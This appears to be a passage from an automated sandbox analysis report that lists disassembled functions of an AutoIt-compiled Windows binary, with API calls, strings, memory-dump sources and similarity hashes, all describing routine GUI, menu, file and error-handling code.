Function 00A2B72E, Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00A2B73B
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00A2B7B1
GetLastError.KERNEL32 ref: 00A2B7BB
SetErrorMode.KERNEL32(00000000,READY), ref: 00A2B828

Strings

NOTREADY, xrefs: 00A2B7E7
READY, xrefs: 00A2B801
INVALID, xrefs: 00A2B7FA
UNKNOWN, xrefs: 00A2B7E0
READONLY, xrefs: 00A2B7F3

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: 6a19c4f3ad2019d7748f076c4ce95625e9f82404fb7255c9c982d1f28bef9048
Instruction ID: bbc7afe4be86b80813662bb3246f5860ff0d78c41b7830b1e7996492e3a81748
Opcode Fuzzy Hash: 6a19c4f3ad2019d7748f076c4ce95625e9f82404fb7255c9c982d1f28bef9048
Instruction Fuzzy Hash: EC318139A01215AFDB00EF68EC85FAEB7B8FF95700F148039E506D7291DB719942CB62

Uniqueness

Uniqueness Score: -1.00%

Function 00A1955C, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 85windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00A1B0C4: GetClassNameW.USER32 ref: 00A1B0E7

SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00A195DF
GetDlgCtrlID.USER32(?), ref: 00A195EA
GetParent.USER32(?), ref: 00A19606
SendMessageW.USER32(00000000,?,ListBox,?), ref: 00A19609
GetDlgCtrlID.USER32(?), ref: 00A19612
GetParent.USER32(?), ref: 00A1962E
SendMessageW.USER32(00000000,?,?,ListBox), ref: 00A19631

Strings

ListBox, xrefs: 00A1959E
ComboBox, xrefs: 00A19569

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$CtrlParent$ClassName
String ID: ComboBox$ListBox
API String ID: 2573188126-1403004172
Opcode ID: 507df31e3ad912b0efec121c41da0f65f2bf9847f3cc015cfa77b11864786a3c
Instruction ID: 9742479eed6336f040779ea81f9de97b752c891e6459246ccfded1bbb87b142f
Opcode Fuzzy Hash: 507df31e3ad912b0efec121c41da0f65f2bf9847f3cc015cfa77b11864786a3c
Instruction Fuzzy Hash: C221CF79A00248BFDF00ABA0CC95EFFBB78EB89340F11401AF521971A1DB365959DA30

Uniqueness

Uniqueness Score: -1.00%

Function 00A19471, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 83windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00A1B0C4: GetClassNameW.USER32 ref: 00A1B0E7

SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00A194F6
GetDlgCtrlID.USER32 ref: 00A19501
GetParent.USER32 ref: 00A1951D
SendMessageW.USER32(00000000,?,00000111,?), ref: 00A19520
GetDlgCtrlID.USER32(?), ref: 00A19529
GetParent.USER32(?), ref: 00A19545
SendMessageW.USER32(00000000,?,?,00000111), ref: 00A19548

Strings

ListBox, xrefs: 00A194B3
ComboBox, xrefs: 00A1947E

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$CtrlParent$ClassName
String ID: ComboBox$ListBox
API String ID: 2573188126-1403004172
Opcode ID: ff7783478a787f7a70406e0c582fbcd5bf9994ff88ed9529eb66cef9e6b8aec5
Instruction ID: fcf845fc9f9ce5ea5f8c74b601f49486508604a3ddc433b6622f7ec35b147bb6
Opcode Fuzzy Hash: ff7783478a787f7a70406e0c582fbcd5bf9994ff88ed9529eb66cef9e6b8aec5
Instruction Fuzzy Hash: 0721F138D00204BFDF00EBA1CC95EFEBB78EF89310F114169B921972A2DB765959DB20

Uniqueness

Uniqueness Score: -1.00%

Function 00A38BC0, Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00A38BEC
CoInitialize.OLE32(00000000), ref: 00A38C19
CoUninitialize.OLE32 ref: 00A38C23
GetRunningObjectTable.OLE32(00000000,?), ref: 00A38D23
SetErrorMode.KERNEL32(00000001,00000029), ref: 00A38E50
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00A52C0C), ref: 00A38E84
CoGetObject.OLE32(?,00000000,00A52C0C,?), ref: 00A38EA7
SetErrorMode.KERNEL32(00000000), ref: 00A38EBA
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00A38F3A
VariantClear.OLEAUT32(?), ref: 00A38F4A

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
String ID:
API String ID: 2395222682-0
Opcode ID: a9aea0e6e2e1a3a1e73ab1c5df087ef5ba07d0ceee8bdd12182bf8e6cc64d04e
Instruction ID: d023f8f73651560f4ee57cb8513635f2f811920343ac2bab10d52c01672b9f81
Opcode Fuzzy Hash: a9aea0e6e2e1a3a1e73ab1c5df087ef5ba07d0ceee8bdd12182bf8e6cc64d04e
Instruction Fuzzy Hash: 76C15571608305AFD700DF68C884A2BB7E9FF89748F10492DF58A9B251DB75ED05CB52

Uniqueness

Uniqueness Score: -1.00%

Function 00A22A16, Relevance: 15.2, APIs: 10, Instructions: 196windowsleepCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(00A86890,000000FF,00000000,00000030), ref: 00A22A92
SetMenuItemInfoW.USER32 ref: 00A22AC8
Sleep.KERNEL32(000001F4), ref: 00A22ADA
GetMenuItemCount.USER32(?), ref: 00A22B1E
GetMenuItemID.USER32(?,00000000), ref: 00A22B3A
GetMenuItemID.USER32(?,-00000001), ref: 00A22B64
GetMenuItemID.USER32(?,?), ref: 00A22BA9
CheckMenuRadioItem.USER32 ref: 00A22BEF
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00A22C03
SetMenuItemInfoW.USER32 ref: 00A22C24

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep
String ID:
API String ID: 1460738036-0
Opcode ID: 0001ccfb4f6be32758ec31054aad03ec7ccfecc00521c8d6980f6b03b2958c3c
Instruction ID: be65ffa5324574c99bf36914faabf4f7c81e568074d1f8285930871f020c1d37
Opcode Fuzzy Hash: 0001ccfb4f6be32758ec31054aad03ec7ccfecc00521c8d6980f6b03b2958c3c
Instruction Fuzzy Hash: 36618BB4900259BFEB21CFA8ED88EEEBBB8EB41344F144579F84197251D731AD06DB21

Uniqueness

Uniqueness Score: -1.00%

Function 00A47192, Relevance: 15.2, APIs: 10, Instructions: 187windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,?,?), ref: 00A47214
SendMessageW.USER32(00000000,?,0000101F,?), ref: 00A47217
GetWindowLongW.USER32 ref: 00A4723B
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00A4725E
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00A472D6

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$LongWindow
String ID:
API String ID: 312131281-0
Opcode ID: 83ac5bd30cd6c5c41d324b514adb0ca0cd2bb9a0d284bb5cefc5270ff6dd442e
Instruction ID: 0b254b3eea2bd59757bbbbcdf0712a2980f53529e10ad999ce111a41b0e21c8c
Opcode Fuzzy Hash: 83ac5bd30cd6c5c41d324b514adb0ca0cd2bb9a0d284bb5cefc5270ff6dd442e
Instruction Fuzzy Hash: 3E61AE75A00248AFDB10DFA4CC81EEE77F8EF49710F104159FA14AB2A1C771AE45DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00A216DE, Relevance: 15.1, APIs: 10, Instructions: 91threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00A21700
GetForegroundWindow.USER32(00000000,?,?,?,?,00A20778,?,00000001,?,?), ref: 00A21714
GetWindowThreadProcessId.USER32(00000000), ref: 00A2171B
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,00A20778,?,00000001,?,?), ref: 00A2172A
GetWindowThreadProcessId.USER32(00000002,00000000), ref: 00A2173C
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,00A20778,?,00000001,?,?), ref: 00A21755
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,00A20778,?,00000001,?,?), ref: 00A21767
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,00A20778,?,00000001,?,?), ref: 00A217AC
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,00A20778,?,00000001,?,?), ref: 00A217C1
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,00A20778,?,00000001,?,?), ref: 00A217CC

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: d8c112ca4634a0a24e62dd56786aa7328dcf6122fbc5735c10526c8dfe9f3de9
Instruction ID: d3ce784b02b466e53bdcc65123a7fa2f7a02a40129e37b6816d5d2dc51841782
Opcode Fuzzy Hash: d8c112ca4634a0a24e62dd56786aa7328dcf6122fbc5735c10526c8dfe9f3de9
Instruction Fuzzy Hash: 7431AE79A00214BFEB11DF99EC84FBE7BE9EBA6711F214025F900862A0C7759D42CF60

Uniqueness

Uniqueness Score: -1.00%

Function 009CFBBD, Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 274comCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,?,?,?), ref: 009CFC06
OleUninitialize.OLE32(?,00000000), ref: 009CFCA5
UnregisterHotKey.USER32(?), ref: 009CFDFC
DestroyWindow.USER32(?), ref: 00A04A00
FreeLibrary.KERNEL32(?), ref: 00A04A65
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00A04A92

Strings

close all, xrefs: 009CFC01

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: 96f2ee8099f81aa43de7439e38e873d0e99561001ebe28d4b5e8982aa0465d51
Instruction ID: 861504977c5f20eadd4a4cb170d2e6b96da532519f49828c00e548ad93a02df9
Opcode Fuzzy Hash: 96f2ee8099f81aa43de7439e38e873d0e99561001ebe28d4b5e8982aa0465d51
Instruction Fuzzy Hash: 69B1CF75B412128FCB29EF14D8A5F69F365FF45340F1582ADE50AAB2A2CB30AD12CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00A1A693, Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 246COMMON

Download Yara Rule

APIs

EnumChildWindows.USER32 ref: 00A1A9A2

Strings

TEXT, xrefs: 00A1A8D9
CLASSNN, xrefs: 00A1A744
NAME, xrefs: 00A1A7D4
INSTANCE, xrefs: 00A1A8B0
REGEXPCLASS, xrefs: 00A1A767
CLASS, xrefs: 00A1A721

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: ChildEnumWindows
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
API String ID: 3555792229-1603158881
Opcode ID: 27e29032345fed9bdba9f758b226838868b5793f69d7218ca93d69e6994f6ffe
Instruction ID: 44a64365388a5c84847b19eb1fb0c5457aba2a7fcc9e18d1df3c2ad938d896c4
Opcode Fuzzy Hash: 27e29032345fed9bdba9f758b226838868b5793f69d7218ca93d69e6994f6ffe
Instruction Fuzzy Hash: 53917270A01646EADB18DFB0C881BEAFB74BF54314F508129E49DA7191DF306AD9CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00A2DB04, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00A2DCBA
SetCurrentDirectoryW.KERNEL32(?), ref: 00A2DCCE
GetFileAttributesW.KERNEL32(?), ref: 00A2DCE6
SetFileAttributesW.KERNEL32(?,00000000), ref: 00A2DD00
SetCurrentDirectoryW.KERNEL32(?), ref: 00A2DD12

Strings

*.*, xrefs: 00A2DD51

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: CurrentDirectory$AttributesFile
String ID: *.*
API String ID: 769691225-438819550
Opcode ID: 79428c45c3f177e4910d0997069ded8d635969f375c750d8ba4325da1c612273
Instruction ID: d90902b27e240ed17e4668022507a0ca18a655a2b3fc8482489498a4a9f60828
Opcode Fuzzy Hash: 79428c45c3f177e4910d0997069ded8d635969f375c750d8ba4325da1c612273
Instruction Fuzzy Hash: DB8191715042519FCB24EF28D855AAAB7E8BB89310F15883EF889C7252E770ED45CB52

Uniqueness

Uniqueness Score: -1.00%

Function 009C2E26, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 193windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32 ref: 009C2EAE

Part of subcall function 009C1DB3: GetClientRect.USER32 ref: 009C1DDC
Part of subcall function 009C1DB3: GetWindowRect.USER32 ref: 009C1E1D
Part of subcall function 009C1DB3: ScreenToClient.USER32 ref: 009C1E45

GetDC.USER32 ref: 009FCF82
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 009FCF95
SelectObject.GDI32(00000000,00000000), ref: 009FCFA3
SelectObject.GDI32(00000000,00000000), ref: 009FCFB8
ReleaseDC.USER32 ref: 009FCFC0
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 009FD04B

Strings

U, xrefs: 009FCF20

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: 73333736495aff49cc7ff47a9873a54652dcbb72b4716701edbc11b4247ff4c6
Instruction ID: cc3b7bc3d90aa28ae0cc35314f7f689857ee5db9beed9f70d2d1b22dc869a45e
Opcode Fuzzy Hash: 73333736495aff49cc7ff47a9873a54652dcbb72b4716701edbc11b4247ff4c6
Instruction Fuzzy Hash: EF71E67140020DEFCF21DFA4CD84EBA7B7AFF49350F148669FA55AA1A5C7318842DB61

Uniqueness

Uniqueness Score: -1.00%

Function 00A2A0B5, Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 159COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,?), ref: 00A2A0FC
LoadStringW.USER32(?,?,00000FFF,?), ref: 00A2A11E

Strings

Error: , xrefs: 00A2A20E
"%s" (%d) : ==> %s:, xrefs: 00A2A25F
Line %d (File "%s"):, xrefs: 00A2A171, 00A2A18A
^ ERROR, xrefs: 00A2A1E8
"%s" (%d) : ==> %s:%s%s, xrefs: 00A2A241

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: LoadString
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 2948472770-2391861430
Opcode ID: c34a3183588dbcbbd920409368555de98796bc64fde5c0e0bdfd262877f8266b
Instruction ID: 0b955601acb0af6af99517ad025cdfaf35ba854cd6d7be9cd48105b7db4a27cf
Opcode Fuzzy Hash: c34a3183588dbcbbd920409368555de98796bc64fde5c0e0bdfd262877f8266b
Instruction Fuzzy Hash: 20516972D00219BBDB15EBE0DD86FEEB779AF54300F104169F405620A1EB326E99DF62

Uniqueness

Uniqueness Score: -1.00%

Function 009EA408, Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 155fileCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,00A843BA,00000104,?,00000001,00000000), ref: 009EA49A
GetStdHandle.KERNEL32(000000F4,?,00000001,00000000), ref: 009EA554
_strlen.LIBCMT ref: 009EA594
WriteFile.KERNEL32(00000000,?,00000000,?,?,?,00000001,00000000), ref: 009EA5A3

Strings

<program name unknown>, xrefs: 009EA4A9
Runtime Error!Program: , xrefs: 009EA468
Microsoft Visual C++ Runtime Library, xrefs: 009EA542
..., xrefs: 009EA4E1

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: File$HandleModuleNameWrite_strlen
String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
API String ID: 2384599179-4022980321
Opcode ID: 34872ef6fbaa650a1a763bbfbad8fa8f8fd81969728e781bcd8df0a92d46a2b6
Instruction ID: db4aee1a6e5a68e870d8836ae45226d07ad91e5776d0fa2a4e1a2ce73cd2b75e
Opcode Fuzzy Hash: 34872ef6fbaa650a1a763bbfbad8fa8f8fd81969728e781bcd8df0a92d46a2b6
Instruction Fuzzy Hash: C9417832A40396BAD72276BA9C06FEF376CFB59715F100139FA05921E1EE609F0542A2

Uniqueness

Uniqueness Score: -1.00%

Function 00A4C27C, Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 154windowCOMMON

Download Yara Rule

APIs

Part of subcall function 009C2612: GetWindowLongW.USER32 ref: 009C2623

Part of subcall function 009C2344: GetCursorPos.USER32(?), ref: 009C2357
Part of subcall function 009C2344: ScreenToClient.USER32 ref: 009C2374
Part of subcall function 009C2344: GetAsyncKeyState.USER32(00000001), ref: 009C2399
Part of subcall function 009C2344: GetAsyncKeyState.USER32(00000002), ref: 009C23A7

ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 00A4C2E4
ImageList_EndDrag.COMCTL32 ref: 00A4C2EA
ReleaseCapture.USER32 ref: 00A4C2F0
SetWindowTextW.USER32(?,00000000), ref: 00A4C39A
SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00A4C3AD
DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 00A4C48F

Strings

@GUI_DRAGFILE, xrefs: 00A4C424
@GUI_DROPID, xrefs: 00A4C3E1

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
String ID: @GUI_DRAGFILE$@GUI_DROPID
API String ID: 1924731296-2107944366
Opcode ID: a6d9f7d1bcd4e0bc2a41196f55fec4a0c192a431bdecbe2166576637732e5e56
Instruction ID: 1def9a4894af36776da66d548493f99a73144d8c01034ff76954c0033c85ca1f
Opcode Fuzzy Hash: a6d9f7d1bcd4e0bc2a41196f55fec4a0c192a431bdecbe2166576637732e5e56
Instruction Fuzzy Hash: 8F518E79604304AFD700EF50CD99FAA7BE4FBC8310F10852DF5998B2A1DB71A945CB62

Uniqueness

Uniqueness Score: -1.00%

Function 00A2A45A, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 104fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(00000002,00007FFF,?,00000000,?,00A2BACC,00000002,?,00000000), ref: 00A2A47A
CreateDirectoryW.KERNEL32(?), ref: 00A2A4D9
CreateFileW.KERNEL32(?,40000000,?,?,00000003,02200000), ref: 00A2A4FE
DeviceIoControl.KERNEL32 ref: 00A2A58E
CloseHandle.KERNEL32(00000000,?,?,00000002,?,?,00000003,02200000), ref: 00A2A599
RemoveDirectoryW.KERNEL32(?,?,?,00000003,02200000), ref: 00A2A5A2
CloseHandle.KERNEL32(00000000,?,?,00000002,?,?,00000003,02200000), ref: 00A2A5AC

Strings

\??\%s, xrefs: 00A2A496

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove
String ID: \??\%s
API String ID: 3827137101-99518778
Opcode ID: 7cb78b0103ee9713defa99c004fda388fce7986c26f5c6f688dbad8616124cf9
Instruction ID: a0af98226763bbb4b603d83196a9f51befc18b9cb7841ee7d873348a69838b04
Opcode Fuzzy Hash: 7cb78b0103ee9713defa99c004fda388fce7986c26f5c6f688dbad8616124cf9
Instruction Fuzzy Hash: 7A31CDBA50011AABDB21DFA4EC49FEB37BCEFC9301F1041B6F608D6060EA7197458B25

Uniqueness

Uniqueness Score: -1.00%

Function 00A1FCB1, Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 78windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,009FE6C9,00000010,?,Bad directive syntax error,00A4F910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 00A1FCD2
LoadStringW.USER32(00000000,?,009FE6C9,00000010), ref: 00A1FCD9
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00A1FD9D

Strings

Error: , xrefs: 00A1FD6B
Line %d (File "%s"):, xrefs: 00A1FD43
., xrefs: 00A1FD83
%s (%d) : ==> %s.: %s %s, xrefs: 00A1FD07
Line %d:, xrefs: 00A1FD28

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: HandleLoadMessageModuleString
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 2734547477-4153970271
Opcode ID: 66101e5d9b34d9e019251bf9caec8d2ba6b1a7ea80a1cf8b7c55e28ace5c7449
Instruction ID: 20bc922f7b072b602e61dcb81c837f7adb996163f7fb9cea55b806fe1c76b4f1
Opcode Fuzzy Hash: 66101e5d9b34d9e019251bf9caec8d2ba6b1a7ea80a1cf8b7c55e28ace5c7449
Instruction Fuzzy Hash: 76212F3290425ABFDF12EBA0DC4AFFE7739BF54301F04486AF505620A1DA329A54DB51

Uniqueness

Uniqueness Score: -1.00%

Function 00A19645, Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 75windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00A19651
GetClassNameW.USER32 ref: 00A19666
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00A196F3

Strings

smallicons, xrefs: 00A196BB
list, xrefs: 00A196D5
largeicons, xrefs: 00A19687
details, xrefs: 00A196A1
SHELLDLL_DefView, xrefs: 00A19672

Memory Dump Source

